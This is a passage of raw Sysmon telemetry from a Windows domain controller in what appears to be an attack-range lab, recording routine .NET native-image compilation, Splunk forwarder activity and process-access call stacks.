13:50:50.648{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923A-6005-2604-00000000A301}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.633{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-923A-6005-2604-00000000A301}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.633{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923A-6005-2604-00000000A301}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:50.539{59A5CD1D-9239-6005-2404-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e94-0\System.Data.Services.dll2021-01-18 13:50:50.539 10341000x80000000000000008442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9239-6005-2504-00000000A301}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9239-6005-2504-00000000A301}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9239-6005-2504-00000000A301}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:49.899{59A5CD1D-9239-6005-2504-00000000A301}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:51.711{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923B-6005-2904-00000000A301}1128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:51.695{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-923B-6005-2904-00000000A301}1128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:51.695{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923B-6005-2904-00000000A301}1128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:51.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923B-6005-2804-00000000A301}4808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:51.477{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-923B-6005-2804-00000000A301}4808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:51.477{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923B-6005-2804-00000000A301}4808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:51.383{59A5CD1D-923A-6005-2704-00000000A301}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d58-0\System.Data.Services.Client.dll2021-01-18 13:50:51.383 10341000x80000000000000008463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:52.273{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923C-6005-2B04-00000000A301}4724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:52.258{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-923C-6005-2B04-00000000A301}4724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:52.258{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923C-6005-2B04-00000000A301}4724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(w